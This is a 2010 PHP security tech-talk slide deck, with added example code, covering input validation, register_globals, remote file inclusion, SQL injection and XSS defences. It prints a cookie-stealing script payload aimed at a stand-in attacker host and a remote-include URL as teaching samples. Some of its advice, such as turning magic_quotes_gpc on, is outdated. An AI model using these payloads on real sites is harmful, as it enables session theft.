Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama, Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875 Fax : +603-7981 9166 Copyright @ Alsys MSC SDN BHD 2010

Php security

PHP Security Tech Talk

Page 1: Php security


Page 2: Php security


• Importance of PHP Security

• Concerns of PHP Security

1. Input Validation

2. Register Globals

3. Code Injection

4. SQL injection

5. Cross-site Scripting (XSS)

Page 3: Php security


• Protect the server from crashing

• Prevent malicious users from gaining root access

• Protect customer data

Page 4: Php security


• All user input is unreliable and can't be trusted

Solution:

• Validate every user input before it is used

• Validation on the client side is good for the user

• Validation on the server side is good for security
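As an added example (not code from the original slides), here is what the server-side half of that rule looks like for a registration form. The field names, the character set allowed in a username and the age range are assumptions chosen for illustration; the point is that every rule is enforced again on the server regardless of what the browser checked.

```php
<?php
// Added example (not from the original slides): server-side validation of
// form input. Field names and rules are assumptions for illustration.
declare(strict_types=1);

/**
 * Validate a registration form. Returns an array of error messages keyed by
 * field; an empty array means every field passed.
 */
function validate_registration(array $input): array
{
    $errors = [];

    // PHP turns "username[]=x" into an array; treat anything that is not a
    // string as missing instead of passing it to string functions.
    $username = is_string($input['username'] ?? null) ? $input['username'] : '';
    $email    = is_string($input['email'] ?? null) ? $input['email'] : '';
    $age      = is_string($input['age'] ?? null) ? $input['age'] : '';

    // Allow-list the username to a short, safe character set.
    if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $username)) {
        $errors['username'] = 'Username must be 3-32 letters, digits or underscores';
    }

    // filter_var() rejects malformed addresses whatever the client-side check said.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors['email'] = 'Invalid e-mail address';
    }

    // Numeric range: FILTER_VALIDATE_INT with bounds returns false for anything else.
    $ageValue = filter_var($age, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 13, 'max_range' => 120]]);
    if ($ageValue === false) {
        $errors['age'] = 'Age must be an integer between 13 and 120';
    }

    return $errors;
}

// Constructed sample requests: one clean, one that a browser-only check would
// not have stopped (the browser can always be bypassed).
$good = ['username' => 'alice_01', 'email' => 'alice@example.com', 'age' => '34'];
$bad  = ['username' => 'alice<script>', 'email' => 'not-an-email', 'age' => '-5'];

var_dump(validate_registration($good) === []);   // bool(true)
print_r(validate_registration($bad));            // three error messages
```

In a real script the array passed in is `$_POST` (or `$_GET`); the function deliberately takes it as a parameter so the rules can be unit-tested without a web server.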

Page 5: Php security


• When "register_globals" is set ON, an uninitialized variable can be injected via user input

• Example

<?php

if (authenticate_user()) {
    $authenticated = true;
}

// - - - - -

// The guard must test !$authenticated (the original slide omitted the "!",
// which would reject users who did authenticate). The uninitialized
// $authenticated is the weakness the slide is illustrating.
if (!$authenticated) {
    die("Authentication required");
}

?>

If $authenticated is set to 1 via GET (http://ffs.com/admin.php?authenticated=1), the check is bypassed.

Page 6: Php security


• Set "register_globals" Off in php.ini (disabled by default in versions >= 4.1.0)

• Alternative to register_globals: SUPERGLOBALS

• $_GET – data from GET requests

• $_POST – POST request data

• $_COOKIE – cookie data

• $_FILES – uploaded file data

• $_SERVER - server data

• $_ENV – environment variables

• $_REQUEST – mix of GET, POST, COOKIE
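As an added example (not code from the original slides), the admin check from the register_globals slide rewritten the way the two slides above recommend: the flag is initialised before use, request data is read only through superglobals, and the script refuses to run if the legacy directive is still on. authenticate_user() is a constructed stand-in for a real credential check, and the expected user name and token are placeholders.

```php
<?php
// Added example (not from the original slides): the admin check from the
// register_globals slide, rewritten so request variables cannot influence it.
// authenticate_user() is a constructed stand-in; user name and token are placeholders.
declare(strict_types=1);

/** Startup check: refuse to run if the legacy directive is still enabled. */
function register_globals_is_on(): bool
{
    // ini_get() returns false when the directive no longer exists (PHP >= 5.4).
    return filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN);
}

/** Constructed stand-in: a real implementation verifies a password hash or a session. */
function authenticate_user(array $post): bool
{
    return ($post['user'] ?? '') === 'admin'
        && hash_equals('constructed-token', (string) ($post['token'] ?? ''));
}

/**
 * The flag is initialised before use and is only ever set by authenticate_user(),
 * which reads request data from the $_POST array passed in explicitly.
 * A query string such as ?authenticated=1 has no variable to land in.
 */
function is_request_authenticated(array $get, array $post): bool
{
    $authenticated = false;            // never rely on an unset variable
    if (authenticate_user($post)) {
        $authenticated = true;
    }
    return $authenticated;             // $get is never consulted for this decision
}

function require_authentication(array $get, array $post): void
{
    if (register_globals_is_on()) {
        die('register_globals must be Off');
    }
    if (!is_request_authenticated($get, $post)) {
        http_response_code(403);
        die('Authentication required');
    }
}

// Constructed requests: the forged GET parameter from the slide, and a genuine login.
var_dump(is_request_authenticated(['authenticated' => '1'], []));                              // bool(false)
var_dump(is_request_authenticated([], ['user' => 'admin', 'token' => 'constructed-token']));   // bool(true)

// In the real script: require_authentication($_GET, $_POST);
```

Passing `$_GET` and `$_POST` in as parameters rather than touching the superglobals inside the functions keeps the decision testable and makes it obvious in review which request channel each value came from.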

Page 7: Php security


• Dynamic paths/files used in require/include statements

• Example:

<?php
include "{$_GET['path']}/script.php";
?>

If $path is set to "http://www.hackers.com" via GET, the statement becomes

<?php
include "http://www.hackers.com/script.php";
?>

• Avoid using dynamic paths

• Always use full paths, defined by constants
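As an added example (not code from the original slides), the dynamic include above replaced by a constant base path plus an allow-list of page names, which is what the two recommendations amount to in practice. APP_ROOT, the pages/ directory and the page names are assumptions.

```php
<?php
// Added example (not from the original slides): replacing the dynamic include
// from the slide with a constant base path and an allow-list of page names.
// APP_ROOT, the pages/ directory and the page names are assumptions.
declare(strict_types=1);

define('APP_ROOT', __DIR__);                  // fixed, absolute base path
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Map a user-supplied page name to an absolute file under APP_ROOT/pages, or
 * return null if it is not on the allow-list. The request value is never used
 * to build the path directly, so "../", URLs and null bytes have nothing to act on.
 */
function resolve_page(string $requested): ?string
{
    if (!in_array($requested, ALLOWED_PAGES, true)) {   // strict comparison
        return null;
    }
    return APP_ROOT . '/pages/' . $requested . '.php';
}

/**
 * Defence in depth: even for an allow-listed name, confirm the resolved file
 * really lives under the pages directory before including it.
 */
function include_page(string $requested): bool
{
    $path = resolve_page($requested);
    if ($path === null) {
        return false;
    }
    $real = realpath($path);
    $base = realpath(APP_ROOT . '/pages');
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $real;
    return true;
}

// Constructed inputs: an allow-listed page and two values no allow-list entry matches.
var_dump(resolve_page('home') !== null);                    // bool(true)
var_dump(resolve_page('../../etc/passwd'));                 // NULL
var_dump(resolve_page('http://example.invalid/script'));    // NULL
```

Alongside the code, set `allow_url_include = Off` in php.ini (it is Off by default) so that an include of a remote URL fails at the interpreter level even if a dynamic path survives somewhere in the code base.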

Page 8: Php security


• Allows malicious SQL to run on the database server

• Allows a malicious user to gain root access

• Removal of data

• Modification of existing values

• Denial of service

Page 9: Php security


• MySQL prepared statements - using mysqli::prepare()

• Validate input data before sending it to the database

• addslashes(), mysql_real_escape_string()

• magic_quotes_gpc - Set to ON

• error_reporting - Set to E_ALL

• display_errors – Set to ON in development, OFF in production

• log_errors – Set to ON in production

• error_log – Set to the desired location of the error log
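As an added example (not code from the original slides), a user lookup written with a mysqli prepared statement next to the string-building form it replaces, with the production error-handling profile from the slide applied at the top. The users table, its columns, the connection details and the log path are assumptions. Of the slide's four SQL measures, prepared statements are the one that does not depend on escaping: addslashes() and mysql_real_escape_string() are character-set dependent escapes, the mysql_* extension was removed in PHP 7.0, and magic_quotes_gpc was deprecated in PHP 5.3 and removed in PHP 5.4.

```php
<?php
// Added example (not from the original slides): a user lookup written with a
// mysqli prepared statement, next to the string-building form it replaces.
// The users table, its columns, connection details and log path are assumptions.
declare(strict_types=1);

// Production error-handling profile from the slide, applied at runtime.
error_reporting(E_ALL);
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app-errors.log');   // assumed path

// Raise exceptions on mysqli errors instead of returning false silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Vulnerable form, kept for comparison: the value is spliced into the SQL text,
 * so any quote in $username changes the structure of the query. A legitimate
 * name such as o'brien already breaks it; a crafted one rewrites it.
 */
function find_user_unsafe(mysqli $db, string $username): ?array
{
    $sql = "SELECT id, email FROM users WHERE username = '$username'";
    $row = $db->query($sql)->fetch_assoc();
    return $row ?: null;
}

/**
 * Safe form: the statement is compiled with a placeholder and the value is
 * sent separately as a typed parameter, so it is always treated as data.
 */
function find_user(mysqli $db, string $username): ?array
{
    // Validation still comes first: reject sizes the application never expects.
    $len = strlen($username);
    if ($len === 0 || $len > 64) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, email FROM users WHERE username = ?');
    $stmt->bind_param('s', $username);     // 's' binds a string parameter
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Constructed usage (placeholder connection details):
// $db = new mysqli('db.internal', 'app', 'app-password', 'shop');
// var_dump(find_user($db, "o'brien"));   // the apostrophe is bound as data; the query runs as intended
```

`mysqli_stmt::get_result()` requires the mysqlnd driver; on builds without it, use `bind_result()` and `fetch()` instead. The same split applies to the error settings: `display_errors` Off keeps stack traces and SQL fragments out of responses, while `log_errors` plus `error_log` keeps them available to the operators who need them.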

Page 10: Php security


• Inject HTML/script into a page, pass a request to another site

• Session take-over

• Password theft

• User tracking by 3rd parties

• Example:

<script>document.location = "http://cookiehaker.com/xss.php?"+document.cookie</script>

Page 11: Php security


• Server Side Validation for all Input Data

• htmlspecialchars() – encodes ', ", <, >, &

• htmlentities() – converts all applicable characters to HTML entities

• strip_tags() – removes HTML and PHP tags
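As an added example (not code from the original slides), the three functions above applied to untrusted data, including input shaped like the payload on the XSS slide. The comment-box markup and sample values are constructed. One caveat a practitioner wants here: before PHP 8.1, htmlspecialchars() leaves the single quote alone unless ENT_QUOTES is passed, so the slide's list of five characters only holds with that flag.

```php
<?php
// Added example (not from the original slides): encoding untrusted data before
// it is placed in HTML, comparing the three functions the slide lists.
// The markup and sample values are constructed.
declare(strict_types=1);

/** Encode for an HTML text node or a quoted attribute value. */
function e(string $untrusted): string
{
    // ENT_QUOTES encodes ' as well as "; before PHP 8.1 the default flags
    // leave ' untouched, which matters inside single-quoted attributes.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render a comment box: every dynamic value goes through e(). */
function render_comment(string $author, string $body): string
{
    return '<div class="comment" data-author="' . e($author) . '">'
         . '<p>' . e($body) . '</p></div>';
}

// Constructed input shaped like the payload on the XSS slide.
$payload = '<script>document.location="http://example.invalid/?"+document.cookie</script>';
$author  = "O'Brien & Co";

echo render_comment($author, $payload), "\n";
// <div class="comment" data-author="O&#039;Brien &amp; Co"><p>&lt;script&gt;...&lt;/script&gt;</p></div>
// The browser shows the script text; it does not run it.

// For comparison, the other two functions from the slide:
echo htmlentities("café <b>", ENT_QUOTES, 'UTF-8'), "\n";         // caf&eacute; &lt;b&gt;
echo strip_tags("Hello <b>world</b><script>x()</script>"), "\n";  // Hello worldx()
```

strip_tags() removes the tags but keeps the text between them, and it is a sanitiser rather than an encoder, so it is not a substitute for escaping on output. The reliable pattern is the one render_comment() follows: store input as received (after validation) and encode at the point where it is written into HTML.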

Page 12: Php security


• XSS Me - https://addons.mozilla.org/en-US/firefox/addon/7598/

• Web Developer Tool

• Firefox – https://addons.mozilla.org/en-US/firefox/addon/60/

• IE - http://www.microsoft.com/downloads/details.aspx?FamilyID=E59C3964-672D-4511-BB3E-2D5E1DB91038

• Firebug - https://addons.mozilla.org/en-US/firefox/addon/1843/
